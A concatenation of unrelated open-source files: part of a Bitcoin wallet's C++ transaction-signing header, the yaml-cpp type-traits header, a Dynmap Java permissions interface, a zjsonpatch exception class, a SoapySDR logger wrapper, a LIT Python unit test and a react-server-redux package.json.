UTXO utxo(value, height, txindex, outputIndex, txHash, script);
//set spenders
auto spenderPtr = make_shared<ScriptSpender>(utxo, feedPtr_);
spenderPtr->setSequence(sequence);
signer_->addSpender(spenderPtr);
}
void addRecipient(const BinaryData& script, uint64_t value)
{
auto txOutRef = BtcUtils::getTxOutScrAddrNoCopy(script);
auto p2pkh_prefix =
SCRIPT_PREFIX(BlockDataManagerConfig::getPubkeyHashPrefix());
auto p2sh_prefix =
SCRIPT_PREFIX(BlockDataManagerConfig::getScriptHashPrefix());
shared_ptr<ScriptRecipient> recipient;
if (txOutRef.type_ == p2pkh_prefix)
recipient = make_shared<Recipient_P2PKH>(txOutRef.scriptRef_, value);
else if (txOutRef.type_ == p2sh_prefix)
recipient = make_shared<Recipient_P2SH>(txOutRef.scriptRef_, value);
else if (txOutRef.type_ == SCRIPT_PREFIX_OPRETURN)
recipient = make_shared<Recipient_OPRETURN>(txOutRef.scriptRef_);
else if (txOutRef.type_ == SCRIPT_PREFIX_P2WSH ||
txOutRef.type_ == SCRIPT_PREFIX_P2WPKH)
recipient = make_shared<Recipient_Bech32>(txOutRef.scriptRef_, value);
else
throw WalletException("unexpected output type");
signer_->addRecipient(recipient);
}
void signTx(void)
{
signer_->sign();
if (!signer_->verify())
throw runtime_error("failed signature");
}
void setLockTime(unsigned locktime)
{
signer_->setLockTime(locktime);
}
BinaryData getSignedTx(void)
{
BinaryData finalTx(signer_->serialize());
return finalTx;
}
const BinaryData& getSigForInputIndex(unsigned id) const
{
return signer_->getSigForInputIndex(id);
}
BinaryData getWitnessDataForInputIndex(unsigned id)
{
return BinaryData(signer_->getWitnessData(id));
}
bool isInptuSW(unsigned id) const
{
return signer_->isInputSW(id);
}
BinaryData serializeSignedTx() const
{
return signer_->serialize();
}
BinaryData serializeState(void) const
{
return signer_->serializeState();
}
virtual ~PythonSigner(void) = 0;
virtual const SecureBinaryData& getPrivateKeyForIndex(unsigned) = 0;
virtual const SecureBinaryData& getPrivateKeyForImportIndex(unsigned) = 0;
};
////////////////////////////////////////////////////////////////////////////////
class PythonSigner_BCH : public PythonSigner
{
public:
PythonSigner_BCH(WalletContainer& wltContainer) :
PythonSigner(wltContainer)
{
signer_ = make_unique<Signer_BCH>();
}
void addSpender(
uint64_t value,
uint32_t height, uint16_t txindex, uint16_t outputIndex,
const BinaryData& txHash, const BinaryData& script, unsigned sequence)
{
UTXO utxo(value, height, txindex, outputIndex, txHash, script);
//set spenders
auto spenderPtr = make_shared<ScriptSpender_BCH>(utxo, feedPtr_);
spenderPtr->setSequence(sequence);
signer_->addSpender(spenderPtr);
}
};
class ResolverFeed_Universal;
////////////////////////////////////////////////////////////////////////////////
class UniversalSigner
{
private:
unique_ptr<Signer> signer_;
shared_ptr<ResolverFeed_Universal> feedPtr_;
public:
UniversalSigner(const string& signerType);
virtual ~UniversalSigner(void) = 0;
void updateSignerState(const BinaryData& state)
{
signer_->deserializeState(state);
}
void populateUtxo(const BinaryData& hash, unsigned txoId,
uint64_t value, const BinaryData& script)
{
UTXO utxo(value, UINT32_MAX, UINT32_MAX, txoId, hash, script);
signer_->populateUtxo(utxo);
}
void signTx(void)
{
signer_->sign();
}
void setLockTime(unsigned locktime)
{
signer_->setLockTime(locktime);
}
void setVersion(unsigned version)
{
signer_->setVersion(version);
}
void addSpenderByOutpoint(
const BinaryData& hash, unsigned index, unsigned sequence, uint64_t value)
{
signer_->addSpender_ByOutpoint(hash, index, sequence, value);
}
void addRecipient(uint64_t value, const BinaryData& script)
{
auto recipient = make_shared<Recipient_Universal>(script, value);
signer_->addRecipient(recipient);
}
BinaryData getSignedTx(void)
{
BinaryData finalTx(signer_->serialize());
return finalTx;
}
const BinaryData& getSigForInputIndex(unsigned id) const
{
return signer_->getSigForInputIndex(id);
}
BinaryData getWitnessDataForInputIndex(unsigned id)
{
return BinaryData(signer_->getWitnessData(id));
}
bool isInptuSW(unsigned id) const
{
return signer_->isInputSW(id);
}
BinaryData serializeState(void) const
{
return signer_->serializeState();
}
void deserializeState(const BinaryData& state)
{
signer_->deserializeState(state);
}
TxEvalState getSignedState(void) const
{
return signer_->evaluateSignedState();
}
BinaryData serializeSignedTx() const
{
return signer_->serialize();
}
virtual string getPublicDataForKey(const string&) = 0;
virtual const SecureBinaryData& getPrivDataForKey(const string&) = 0;
};
////////////////////////////////////////////////////////////////////////////////
class PythonVerifier
{
private:
unique_ptr<Signer> signer_;
public:
PythonVerifier()
{
signer_ = make_unique<Signer>();
signer_->setFlags(SCRIPT_VERIFY_SEGWIT);
}
bool verifySignedTx(const BinaryData& rawTx,
const map<BinaryData, map<unsigned, BinaryData> >& utxoMap)
{
return signer_->verifyRawTx(rawTx, utxoMap);
}
};
////////////////////////////////////////////////////////////////////////////////
class PythonVerifier_BCH
{
private:
unique_ptr<Signer_BCH> signer_;
public:
PythonVerifier_BCH()
{
signer_ = make_unique<Signer_BCH>();
}
bool verifySignedTx(const BinaryData& rawTx,
const map<BinaryData, map<unsigned, BinaryData> >& utxoMap)
{
return signer_->verifyRawTx(rawTx, utxoMap);
}
};
////////////////////////////////////////////////////////////////////////////////
class ResolverFeed_PythonWalletSingle : public ResolvedFeed_AssetWalletSingle
{
private:
PythonSigner* signerPtr_ = nullptr;
public:
ResolverFeed_PythonWalletSingle(
shared_ptr<AssetWallet_Single> walletPtr,
PythonSigner* signerptr) :
ResolvedFeed_AssetWalletSingle(walletPtr),
signerPtr_(signerptr)
{
if (signerPtr_ == nullptr)
throw WalletException("null signer ptr");
}
const SecureBinaryData& getPrivKeyForPubkey(const BinaryData& pubkey)
{
auto pubkeyref = BinaryDataRef(pubkey);
auto iter = pubkey_to_asset_.find(pubkeyref);
if (iter == pubkey_to_asset_.end())
throw runtime_error("invalid value");
auto id = iter->second->getId();
if (id >= 0)
return signerPtr_->getPrivateKeyForIndex(id);
id = AssetWallet::convertToImportIndex(id);
return signerPtr_->getPrivateKeyForImportIndex(id);
}
};
////////////////////////////////////////////////////////////////////////////////
class ResolverFeed_Universal : public ResolverFeed
{
private:
UniversalSigner* signerPtr_ = nullptr;
public:
ResolverFeed_Universal(UniversalSigner* signerptr) :
signerPtr_(signerptr)
{
if (signerPtr_ == nullptr)
throw WalletException("null signer ptr");
}
const SecureBinaryData& getPrivKeyForPubkey(const BinaryData& pubkey)
{
auto&& pubkey_hex = pubkey.toHexStr();
auto& data = signerPtr_->getPrivDataForKey(pubkey_hex);
if (data.getSize() == 0)
throw runtime_error("invalid value");
return data;
}
BinaryData getByVal(const BinaryData& val)
{
auto&& val_str = val.toHexStr();
auto data_str = signerPtr_->getPublicDataForKey(val_str);
if (data_str.size() == 0)
throw runtime_error("invalid value");
BinaryData data_bd(data_str);
return data_bd;
}
};
////////////////////////////////////////////////////////////////////////////////
class WalletManager
{
private:
mutable mutex mu_;
const string path_;
map<string, WalletContainer> wallets_;
SwigClient::BlockDataViewer bdv_;
private:
void loadWallets();
SwigClient::BlockDataViewer& getBDVObj(void);
public:
WalletManager(const string& path) :
path_(path)
{
loadWallets();
}
bool hasWallet(const string& id)
{
unique_lock<mutex> lock(mu_);
auto wltIter = wallets_.find(id);
return wltIter != wallets_.end();
}
void setBDVObject(const SwigClient::BlockDataViewer& bdv)
{
bdv_ = bdv;
}
int getLastComputedIndex(const string& id) const;
void synchronizeWallet(const string& id, unsigned chainLength);
void duplicateWOWallet(
const SecureBinaryData& pubRoot,
const SecureBinaryData& chainCode,
unsigned chainLength);
WalletContainer& getCppWallet(const string& id);
bool setImport(
string wltID, int importID, const SecureBinaryData& pubkey);
};
#endif
| 8,517 |
826 | <filename>lib/yamlcpp/include/yaml-cpp/traits.h
#ifndef TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
#define TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
#if defined(_MSC_VER) || \
(defined(__GNUC__) && (__GNUC__ == 3 && __GNUC_MINOR__ >= 4) || \
(__GNUC__ >= 4)) // GCC supports "pragma once" correctly since 3.4
#pragma once
#endif
#include <type_traits>
#include <utility>
#include <string>
#include <sstream>
namespace YAML {
template <typename>
struct is_numeric {
enum { value = false };
};
template <>
struct is_numeric<char> {
enum { value = true };
};
template <>
struct is_numeric<unsigned char> {
enum { value = true };
};
template <>
struct is_numeric<int> {
enum { value = true };
};
template <>
struct is_numeric<unsigned int> {
enum { value = true };
};
template <>
struct is_numeric<long int> {
enum { value = true };
};
template <>
struct is_numeric<unsigned long int> {
enum { value = true };
};
template <>
struct is_numeric<short int> {
enum { value = true };
};
template <>
struct is_numeric<unsigned short int> {
enum { value = true };
};
#if defined(_MSC_VER) && (_MSC_VER < 1310)
template <>
struct is_numeric<__int64> {
enum { value = true };
};
template <>
struct is_numeric<unsigned __int64> {
enum { value = true };
};
#else
template <>
struct is_numeric<long long> {
enum { value = true };
};
template <>
struct is_numeric<unsigned long long> {
enum { value = true };
};
#endif
template <>
struct is_numeric<float> {
enum { value = true };
};
template <>
struct is_numeric<double> {
enum { value = true };
};
template <>
struct is_numeric<long double> {
enum { value = true };
};
template <bool, class T = void>
struct enable_if_c {
typedef T type;
};
template <class T>
struct enable_if_c<false, T> {};
template <class Cond, class T = void>
struct enable_if : public enable_if_c<Cond::value, T> {};
template <bool, class T = void>
struct disable_if_c {
typedef T type;
};
template <class T>
struct disable_if_c<true, T> {};
template <class Cond, class T = void>
struct disable_if : public disable_if_c<Cond::value, T> {};
}
template <typename S, typename T>
struct is_streamable {
template <typename SS, typename TT>
static auto test(int)
-> decltype(std::declval<SS&>() << std::declval<TT>(), std::true_type());
template <typename, typename>
static auto test(...) -> std::false_type;
static const bool value = decltype(test<S, T>(0))::value;
};
template<typename Key, bool Streamable>
struct streamable_to_string {
static std::string impl(const Key& key) {
std::stringstream ss;
ss << key;
return ss.str();
}
};
template<typename Key>
struct streamable_to_string<Key, false> {
static std::string impl(const Key&) {
return "";
}
};
#endif // TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
| 1,119 |
1,403 | package org.dynmap.forge_1_12_2.permissions;
import java.util.Set;
import net.minecraft.command.ICommandSender;
public interface PermissionProvider {
boolean has(ICommandSender sender, String permission);
boolean hasPermissionNode(ICommandSender sender, String permission);
Set<String> hasOfflinePermissions(String player, Set<String> perms);
boolean hasOfflinePermission(String player, String perm);
}
| 136 |
434 | /*
* Copyright 2016 flipkart.com zjsonpatch.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.flipkart.zjsonpatch;
/**
* User: holograph
* Date: 03/08/16
*/
public class JsonPatchApplicationException extends RuntimeException {
Operation operation;
JsonPointer path;
public JsonPatchApplicationException(String message, Operation operation, JsonPointer path) {
super(message);
this.operation = operation;
this.path = path;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
if (operation != null) sb.append('[').append(operation).append(" Operation] ");
sb.append(getMessage());
if (path != null) sb.append(" at ").append(path.isRoot() ? "root" : path);
return sb.toString();
}
}
| 425 |
749 | <filename>lib/Logger.cpp
// Copyright (c) 2014-2015 <NAME>
// SPDX-License-Identifier: BSL-1.0
#include <SoapySDR/Logger.hpp>
void SoapySDR::log(const LogLevel logLevel, const std::string &message)
{
return SoapySDR_log(logLevel, message.c_str());
}
void SoapySDR::vlogf(const SoapySDRLogLevel logLevel, const char *format, va_list argList)
{
return SoapySDR_vlogf(logLevel, format, argList);
}
void SoapySDR::registerLogHandler(const LogHandler &handler)
{
return SoapySDR_registerLogHandler(handler);
}
void SoapySDR::setLogLevel(const LogLevel logLevel)
{
SoapySDR_setLogLevel(logLevel);
}
| 237 |
2,854 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Lint as: python3
"""Tests for lit_nlp.lib.model."""
from absl.testing import absltest
from lit_nlp.api import dataset as lit_dataset
from lit_nlp.api import types as lit_types
from lit_nlp.components import static_preds
class StaticPredictionsTest(absltest.TestCase):
def setUp(self):
super().setUp()
number_names = [
"zero", "one", "two", "three", "four", "five", "six", "seven", "eight",
"nine"
]
# pylint: disable=g-complex-comprehension
dummy_inputs = [{
"name": name,
"val": i
} for i, name in enumerate(number_names)]
# pylint: enable=g-complex-comprehension
input_spec = {"name": lit_types.TextSegment(), "val": lit_types.Scalar()}
self.input_ds = lit_dataset.Dataset(input_spec, dummy_inputs)
dummy_preds = [{
"pred": "{name:s}={val:d}".format(**d)
} for d in self.input_ds.examples]
self.preds_ds = lit_dataset.Dataset({"pred": lit_types.TextSegment()},
dummy_preds)
def test_all_identifiers(self):
"""Test using all fields as identifier keys."""
model = static_preds.StaticPredictions(
self.input_ds, self.preds_ds, input_identifier_keys=["name", "val"])
self.assertEqual(self.input_ds.spec(), model.input_spec())
self.assertEqual(self.preds_ds.spec(), model.output_spec())
# Test on whole dataset
self.assertEqual(
list(model.predict(self.input_ds.examples)),
list(self.preds_ds.examples))
# Test on a slice
self.assertEqual(
list(model.predict(self.input_ds.examples[2:5])),
list(self.preds_ds.examples[2:5]))
# Test on unknown examples
with self.assertRaises(KeyError):
# Should raise an exception on the second input.
inputs = [{"name": "nine", "val": 9}, {"name": "twenty", "val": 20}]
# Use list() to force the generator to run.
_ = list(model.predict(inputs))
def test_partial_identifiers(self):
"""Test using only some fields as identifier keys."""
model = static_preds.StaticPredictions(
self.input_ds, self.preds_ds, input_identifier_keys=["name"])
self.assertEqual({"name": lit_types.TextSegment()}, model.input_spec())
self.assertEqual(self.preds_ds.spec(), model.output_spec())
# Test on whole dataset
self.assertEqual(
list(model.predict(self.input_ds.examples)),
list(self.preds_ds.examples))
# Test on a slice
self.assertEqual(
list(model.predict(self.input_ds.examples[2:5])),
list(self.preds_ds.examples[2:5]))
# Test on unknown examples
with self.assertRaises(KeyError):
# Should raise an exception on the second input.
inputs = [{"name": "nine", "val": 9}, {"name": "twenty", "val": 20}]
# Use list() to force the generator to run.
_ = list(model.predict(inputs))
if __name__ == "__main__":
absltest.main()
| 1,366 |
4,329 | <gh_stars>1000+
{
"name": "react-server-redux",
"version": "1.0.0-alpha.2",
"description": "Redux support for React-Server",
"main": "target/index.js",
"scripts": {
"build": "gulp build",
"clean": "rimraf target npm-debug.log*",
"lint": "eslint src test",
"test": "ava test/*.spec.js",
"prepublish": "npm run build"
},
"repository": {
"type": "git",
"url": "https://github.com/redfin/react-server"
},
"keywords": [
"react-server",
"redux"
],
"author": "<NAME>",
"license": "Apache-2.0",
"bugs": {
"url": "https://github.com/redfin/react-server/issues"
},
"homepage": "https://github.com/redfin/react-server",
"dependencies": {
"react-redux": "^5.0.1",
"redux": "^3.6.0"
},
"peerDependencies": {
"react": "~0.14.9 || ^15.3.0 || ^16.0.0"
}
}
| 380 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.